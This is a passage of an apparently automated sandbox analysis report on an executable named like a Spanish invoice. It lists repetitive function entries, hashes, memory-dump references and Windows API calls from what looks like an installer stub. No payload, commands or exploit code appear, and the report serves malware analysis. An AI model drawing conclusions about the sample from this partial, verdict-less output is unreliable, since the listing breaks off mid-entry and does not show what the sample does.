                                                                                                                                  • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                                                  • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                                                                                  Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                                                  • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                                                                                  • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                                                  • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                                                                                  Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                                                  • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                                                                                  • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                                                  • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                                                                                  Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                                  • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                                                                                  • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                                  • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                                                                                  Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                                  • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                                                                                  • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                                  • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                                                                                                  Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                                                  • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                                                                                                                  • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                                                  • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                                                                                                  Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll), ref: 00405359
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 334405425-0
                                                                                                                                  • Opcode ID: 625e2d01befe0dc7e528f44c483af3649fcdedc5513fd11a3b5737dd6ac49bd6
                                                                                                                                  • Instruction ID: 97d29300f9396016dda5dc64ca85157dedbc1c92ed1374a350dd7f5d7f4d946c
                                                                                                                                  • Opcode Fuzzy Hash: 625e2d01befe0dc7e528f44c483af3649fcdedc5513fd11a3b5737dd6ac49bd6
                                                                                                                                  • Instruction Fuzzy Hash: BE21AF31D00205AACF20AFA5CE4899E7A70AF04358F60413BF511B11E0DBB98981DA6E
                                                                                                                                  Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                  • String ID: Call
                                                                                                                                  • API String ID: 3394109436-1824292864
                                                                                                                                  • Opcode ID: 992e8886db538b2378eb457e452863b67dea7c9f650ce1ee9c103e8892db631b
                                                                                                                                  • Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
                                                                                                                                  • Opcode Fuzzy Hash: 992e8886db538b2378eb457e452863b67dea7c9f650ce1ee9c103e8892db631b
                                                                                                                                  • Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD
                                                                                                                                  Function 6FF42A74 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                  • Opcode ID: 53b716115331eecd82f509c2dd70c45ac3c178b7c182d22166af20300c9170ec
                                                                                                                                  • Instruction ID: 6808dfc13f62a12f4ddf052f8021738663fc183850a0d19c84a3d3662addbc2b
                                                                                                                                  • Opcode Fuzzy Hash: 53b716115331eecd82f509c2dd70c45ac3c178b7c182d22166af20300c9170ec
                                                                                                                                  • Instruction Fuzzy Hash: C2518D725146049FDB20EFA8D881B593FA4FF45328F10457ADC14EB3A3D73AA4A8DB61
                                                                                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                                                                                  • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                                                                                  • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                                                                                  • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                                                                                  Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnableShow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1136574915-0
                                                                                                                                  • Opcode ID: 0ff4c43ca7c5305b810fc1be34eeb667a1865b3eede0763af0d3e02c0eb9f5d7
                                                                                                                                  • Instruction ID: 63871ab535fe988d3adb25008cf832d4d85dc6cfcdc2aab035335d2457ba8122
                                                                                                                                  • Opcode Fuzzy Hash: 0ff4c43ca7c5305b810fc1be34eeb667a1865b3eede0763af0d3e02c0eb9f5d7
                                                                                                                                  • Instruction Fuzzy Hash: 2BE0D832E08200CFE724DFA5AA4946D77B4EB80314720447FF201F11D1CE7848418F6D
                                                                                                                                  Function 0040665E Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                                    • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                                                    • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                                                                                    • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2547128583-0
                                                                                                                                  • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                  • Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
                                                                                                                                  • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                  • Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D
                                                                                                                                  Function 00405D7A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
